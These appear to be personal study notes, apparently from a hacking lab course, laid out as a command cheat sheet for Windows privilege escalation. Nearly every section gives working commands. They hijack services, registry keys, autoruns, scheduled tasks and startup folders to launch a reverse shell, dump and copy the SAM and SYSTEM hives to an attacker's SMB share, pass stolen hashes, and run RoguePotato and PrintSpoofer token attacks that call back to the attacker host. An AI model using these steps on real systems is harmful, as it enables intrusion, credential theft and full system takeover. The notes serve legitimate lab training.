================================================================================================================================================================================================
Check out the following links:
HTB Windows Priv Esc Win Priv Esc Examples Syntax for ToolsInsecure Service permissions:
- note you will need to set up a exe and transfer it over to the victim and set up NC
- using accesschk.exe to check user accounts permissions for "daclsvc" service
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
- if user has perms to change the service config (SERVICE_CHANGE_CONFIG)
- query the service:
sc qc daclsvc
- modify the service confi
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
- to catch the shell
net start daclsvc
-------------------------------------------------------------------
Unquoted Service Path
querying: unquotedsvc
sc qc unquotedsvc
- using accesschk.exe, note if a group is allowed to write to the directory
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
- copy your executable from earlier and rename
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
- net start unquotedsvc
--------------------------------------------------------------------
Weak Registry Permissions
querying: regsvc
sc qc regsvc
- using accesschk.exe - regsvc is writeable by "NT AUTH/INTERACTIVE" = means anyone
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
- overwrite the image path registry to point to reverse executable
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
- net start regsvc
---------------------------------------------------------------------
Insecure Service Executables
querying: sc qc filepersvc
sc qc filepermsvc - runs with SERVICE_START_NAME system priv
- using accesschk.eve - showing binary writeable by everyone
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
-copy the reverse executable and replace the filepermservice.exe with it:
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
net start filepermsvc
----------------------------------------------------------------------
Registry - Autoruns
- query for autorun executables
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- using accesschk.exe = writeable by everyone
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
- copy the reverse executable and overwrite Autorun with it
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
- in real world we need admin to log in and engage
------------------------------------------------------------------------
Registry - AlwaysInstallElevated
- query the registry
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- both keys set to 1 (0x1)
- on kali generate a reverse msi
- transfer over to the windows
- trigger shell running with system priv
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
------------------------------------------------------------------------
Passwords- registry
- registry can be searched for keys and values that contain word "password"
reg query HKLM /f password /t REG_SZ /s
- for admin autologon creds
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
-----------------------------------------------------------------------
Password - Saved creds
cmdky /list
runas /savecred /user:admin C:\PrivEsc\reverse.exe
-----------------------------------------------------------------------
Passwords - Security Account Manager (SAM)
- remember you already have smbserver running
copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\
- use a tool to dump the hashes
----------------------------------------------------------------------
Passwords - Passing the Hash
pth-winexe -U 'admin%hash' //10.10.0.46 cmd.exe
----------------------------------------------------------------------
Scheduled tasks
- view contents of the script
type C:\DevTools\CleanUp.ps1
- seems running every min - use accesschk.exe = ability to write to file
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
- start listener and then append a line to the script which runs your reverse.exe executable
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
-----------------------------------------------------------------------
Insecure GUI Apps
- start an RDP session
- you know paint is running with admin priv
tasklist /V | findstr mspaint.exe
- exploit
open paint, open file - paste in: file://c:/windows/system32.cmd.exe
-----------------------------------------------------------------------
Startup apps
- using accesschk.exe = users group can write files to start up directory
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
- using cscript - run createshortcut.vbs.script - creates new shortcut to your reverse.exe in the startup directory
cscript C:\PrivEsc\CreateShortcut.vbs
- set up listener and then simulate an admin logon using RDP with creds you found
rdesktop -u admin 10.10.0.46
( a shell will appear)
-----------------------------------------------------------------------
Token Impersonation - Rogue Potato
- setup a socat redirector on kali, forwarding kali port 135 to port 9999 on windows
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.0.46:9999
- start a listener on kali
- log in as admin on rdp from crack creds earlier, and launch cmd as admin and execute
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
- start another listener
- and in the local service reverse shell run the Rogue potato exploit to trigger second reverse shell
C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999
-----------------------------------------------------------------------
Token Impersonation - printspoofer
- start listener on kali
- logon rdp as admin from cracked creds
- launch cmd as admin
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
- start another kali listener
- and in local service reverse shell run the folloing:
C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
-----------------------------------------------------------------------
Useful scripts:
winPEASany.exe
Seatbelt.exe
PowerUp.ps1
SharpUp.exe